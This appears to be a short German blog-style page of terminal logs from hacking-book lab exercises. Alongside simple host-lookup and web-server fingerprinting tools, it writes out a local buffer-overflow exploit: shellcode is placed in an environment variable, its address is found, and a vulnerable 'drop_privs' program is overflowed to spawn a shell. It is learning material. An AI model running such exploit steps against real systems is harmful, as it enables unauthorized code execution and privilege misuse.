root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gcc -g -fno-stack-protector -z execstack -o host_lookup host_lookup.c
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./host_lookup www.internic.net
www.internic.net has address 192.0.32.9
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./host_lookup www.google.de
www.google.de has address 173.194.70.94
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

Hier sieht man schön, wie die Technik fortschreitet:

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gcc -g -fno-stack-protector -z execstack -o webserver_id webserver_id.c
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./webserver_id www.internic.net
The web server for www.internic.net is Apache
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./webserver_id www.microsoft.com
The web server for www.microsoft.com is Microsoft-IIS/8.0

 

unbekannt?

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# export SHELLCODE=$(cat tiny_shell)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./getenvaddr SHELLCODE ./drop_privs
SHELLCODE will be at 0xbffff8d7
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./drop_privs $(perl -e 'print "\xff\xbf\xd7\xf8"x20')
$ whoami
games
$ id
uid=0(root) gid=0(root) euid=5(games) groups=60(games),0(root)
$ quuit
/bin//sh: 3: quuit: not found
$ exit

 

   

Metasploit  

   